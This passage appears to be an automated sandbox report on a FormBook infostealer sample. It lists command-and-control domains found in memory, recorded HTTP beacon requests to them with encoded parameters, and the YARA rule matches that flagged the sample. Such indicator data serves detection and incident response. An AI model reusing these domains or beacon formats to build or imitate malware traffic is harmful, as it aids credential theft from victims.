          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-cr5.ink/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-cr5.ink/us94/www.barbieexpert.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-cr5.inkReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.barbieexpert.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.barbieexpert.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.barbieexpert.com/us94/www.ontheroadfromdamascus.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.barbieexpert.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emdefencetech.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emdefencetech.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emdefencetech.com/us94/www.nazadypro.shop
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emdefencetech.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hanabi104.online
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hanabi104.online/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hanabi104.onlineReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hot-tubs-59198.bond
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hot-tubs-59198.bond/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hot-tubs-59198.bond/us94/www.simarnit.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hot-tubs-59198.bondReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j5tm84qrs.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j5tm84qrs.top/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j5tm84qrs.top/us94/www.66xecqk.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j5tm84qrs.topReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.l1z3x.cfd
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.l1z3x.cfd/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.l1z3x.cfd/us94/www.abithashop.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.l1z3x.cfdReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shop
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shop/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shop/us94/www.soccercitycupsc.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shopReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bond
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.com/us94/www.hanabi104.online
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.com/us94/www.69v39.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.info
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.info/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.info/us94/www.b-cr5.ink
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.infoReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyz
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyz/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyz/us94/www.j5tm84qrs.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyzReferer:
          Source: explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.1263284729.00000000070C9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000000.1267280115.0000000009242000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BB08000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2502312360.0000000004C47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1261252404.0000000004C4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1261252404.0000000004C48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: unknownDNS traffic detected: queries for: www.emdefencetech.com
          Source: C:\Windows\explorer.exeCode function: 3_2_08897F82 getaddrinfo,setsockopt,recv,3_2_08897F82
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL HTTP/1.1Host: www.emdefencetech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=dEK1UcEseC60ArM7bnAGctGEpZul5aHqilxPZgyrfd7+4uauQhfO1u/GuBaUBJFU+KOU&BbW=QzuhmF0pKL HTTP/1.1Host: www.nazadypro.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL HTTP/1.1Host: www.soccercitycupsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL HTTP/1.1Host: www.69v39.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2509035504.00000000088AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: msdt.exe PID: 7736, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large strings
          Source: 2FcJgghyXg.exe, flogin.csLong String: Length: 230399
          Source: 2FcJgghyXg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2509035504.00000000088AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
